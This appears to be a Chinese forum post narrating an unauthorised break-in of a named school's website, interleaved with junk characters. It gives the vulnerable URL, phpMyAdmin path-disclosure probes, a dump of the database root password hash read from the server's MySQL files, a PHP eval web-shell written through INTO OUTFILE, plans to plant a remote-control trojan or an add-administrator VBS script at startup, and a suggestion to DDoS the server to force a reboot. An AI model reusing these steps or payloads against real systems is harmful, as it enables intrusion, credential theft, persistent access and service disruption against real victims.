友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
: W* |; n/ j, D" ]6 Q发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！


' M. N6 {4 l& m0 D0 Z$ q6 R
3 A3 M0 b4 l8 ~) a常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

: I" a0 w! I+ Z$ h- j; N, s/ j3 \那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

+ X2 j+ y6 v( M6 e! S8 |$ X! S试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
: r+ X- ~+ e% N. _2 f0 I. S2./phpMyAdmin/phpinfo.php  
3 C. O. J' A" `0 U! t- d3./load_file()  
9 f2 \( e2 u7 z$ K( l4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
7 `0 x. u) [4 P3 R: [6 f5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
4 r+ m# W+ P! V# R% A: @4 e6 k  m8./phpmyadmin/libraries/export/xls.php  

2 |( Z: i% a" S0 e均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
! J& Y. [# I& _& K) h
  ]' U5 h% N$ Z* h6 ~, R( D权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
) w: o2 a3 g3 I9 C, `
% E. Q( g/ |* d9 o0 y( M9 U5 b( K+ [想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

. i8 j$ O/ [+ X; t4 ?; `* r6 I6 I% Thttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

$ x3 n0 o; ~/ v) v8 a4 I自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：
2 i, a* @* e# ]5 p, N! @: }
17---- r(0072)
- Y' m# j+ a2 m18---- o(006f)
- G: B: n$ c+ h19---- o(006f)
! _! J- x# p$ v/ _20---- t(0074)
$ K: [- m- F* D* Q5 {. K21---- *(002a)
22---- 8(0038)
, A+ x, b5 L4 x  T+ }23---- 2(0032)
24---- E(0045)
3 h8 H  p9 V' Q1 e+ s# J0 Z25---- 1(0031)
26---- C(0043)
5 k& q7 K9 X: V27---- 5(0035)
28---- 8(0038)
7 x# K+ p% u( S" W" g+ I& F7 N29---- 2(0032)
30---- 8(0038)
: p8 i# i" ?6 c4 T- e) W7 a* ^+ g31---- A(0041)
32---- 9(0039)
3 {" A; g# _/ Y! c2 K2 o/ n33---- B(0042)
& O* ]6 T5 m% F/ X34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
  Y2 a* I$ |1 ~- h' v' p, O37---- 6(0036)
38---- 4(0034)
& l9 e4 n& {# H! C$ W; i39---- 9(0039)
40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
) M& S# C/ ?2 ?) A6 u  N43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
& H# t% D. U3 b, _7 {1 b46---- 8(0038)
& k, u: o3 Q  A1 }) n47---- F(0046)
/ l7 S& l$ f8 D48---- F(0046)
49---- 4(0034)
& h/ h$ n3 @2 o/ w: A50---- F(0046)
- \5 g: [  m' ]) V  `, h51---- 0(0030)
& Y, S# S* F/ v52---- 3(0033)
53---- 2(0032)
54---- A(0041)
" X2 a; ^$ A" ~. U, R# f9 Y55---- 4(0034)
56---- A(0041)
57---- B(0042)
1 ~4 A& t: G8 y: Q. |: \9 `  U58---- *(0044)
59---- *(0035)
; X4 M9 \# M  ?+ B60---- *(0041)
61---- *0032)

解密后成功登陆phpmyamin
                          
9 g" u/ X% @) }8 e; U6 K
) K$ m8 I- x/ N$ h. `                             

& a& L& w& V0 ^6 g3 @7 f找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

; o* g' W0 g( p9 G7 y成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
% y8 e* J/ }2 A7 ^# T5 p: `
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
" F5 \) u; z! A) Y+ A" R: w

服务器上已经有个隐藏帐号了

别名     administrators
. z  n4 l1 b7 K: c  ^6 R注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
4 }( A2 n3 G% Y# U5 \admin
$ o' m. @. ~6 q0 x$ kAdministrator
1 e% C1 A. l+ q5 islipper$
, V! T2 k. C* U- ]sqluser
命令成功完成。
9 c9 T4 h( h# R. h- l( I
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................

      

8 @! h6 |: c, j6 l: n3 q- M

angel